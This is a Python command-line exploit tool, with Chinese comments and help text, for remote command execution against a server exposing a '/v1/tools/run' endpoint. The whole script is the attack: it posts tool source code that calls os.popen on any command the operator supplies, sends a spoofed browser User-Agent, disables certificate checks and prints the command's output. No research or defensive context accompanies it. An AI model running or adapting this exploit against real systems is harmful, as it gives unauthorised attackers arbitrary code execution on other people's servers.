import requests
import sys
import argparse
import json
import platform

class ExploitTool:
    def __init__(self):
        self.on_windows = platform.system() == "Windows"
        self.setup_colors()
        self.parser = self.setup_args()
        self.args = self.parser.parse_args()
    
    def setup_colors(self):
        if self.on_windows:
            self.SUCCESS = ""
            self.ERROR = ""
            self.WARNING = ""
            self.INFO = ""
            self.RESET = ""
        else:
            self.SUCCESS = "\033[92m"  # 绿色
            self.ERROR = "\033[91m"     # 红色
            self.WARNING = "\033[93m"   # 黄色
            self.INFO = "\033[94m"      # 蓝色
            self.RESET = "\033[0m"      # 重置

    def setup_args(self):
        parser = argparse.ArgumentParser(description='远程命令执行漏洞利用工具')
        parser.add_argument('-u', '--url', required=True, help='目标URL (例如: http://192.168.1.100:8000)')
        parser.add_argument('-c', '--command', default='id', help='要执行的命令 (默认: id)')
        parser.add_argument('-d', '--debug', action='store_true', help='启用详细调试输出')
        return parser

    def send_exploit(self, target_url, command):
        endpoint = f"{target_url.rstrip('/')}/v1/tools/run"
        payload = {
            "source_code": f"def test():\n    import os\n    return os.popen('{command}').read()",
            "args": {},
            "json_schema": {"title": "test", "type": "object", "properties": {}},
            "env_vars": {"PYTHONPATH": "/usr/lib/python3/dist-packages"},
            "name": "test"
        }
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36",
            "Connection": "close",
            "Content-Type": "application/json"
        }
        return requests.post(endpoint, json=payload, headers=headers, verify=False, timeout=15)
    
    def parse_response(self, response):
        try:
            if response.status_code == 200:
                resp_data = response.json()
                if "tool_return" in resp_data:
                    return f"{self.SUCCESS}[+] 命令执行成功:{self.RESET}\n{resp_data['tool_return'].strip()}"
                return f"{self.WARNING}[!] 响应中未包含预期结果{self.RESET}\n{json.dumps(resp_data, indent=2)}"
            return f"{self.ERROR}[-] 请求失败 (HTTP {response.status_code}){self.RESET}\n{response.text}"
        except json.JSONDecodeError:
            return f"{self.ERROR}[-] 响应解析失败{self.RESET}\n{response.text[:1000]}"
    
    def debug_output(self, response, command, url):
        output = [
            f"{self.INFO}[*] 调试信息{self.RESET}",
            f"- 目标URL: {url}",
            f"- 执行命令: '{command}'"
        ]
        try:
            output.append(f"- 状态码: {response.status_code}")
            if response.text:
                try:
                    output.append(f"- 响应内容:\n{json.dumps(response.json(), indent=2)}")
                except:
                    output.append(f"- 响应内容:\n{response.text}")
            else:
                output.append("- 响应内容: 空")
        except Exception:
            output.append(f"- 响应内容:\n{response.text[:2000]}")
        return "\n".join(output)

    def run(self):
        try:
            response = self.send_exploit(self.args.url, self.args.command)
            
            if self.args.debug:
                print(self.debug_output(response, self.args.command, self.args.url))
            else:
                result = self.parse_response(response)
                print(result)
                
        except requests.RequestException as e:
            print(f"{self.ERROR}[-] 请求失败: {str(e)}{self.RESET}")
        except Exception as e:
            print(f"{self.ERROR}[-] 发生未知错误: {str(e)}{self.RESET}")

if __name__ == "__main__":
    tool = ExploitTool()
    if len(sys.argv) == 1:
        tool.parser.print_help()
        sys.exit(1)
    tool.run()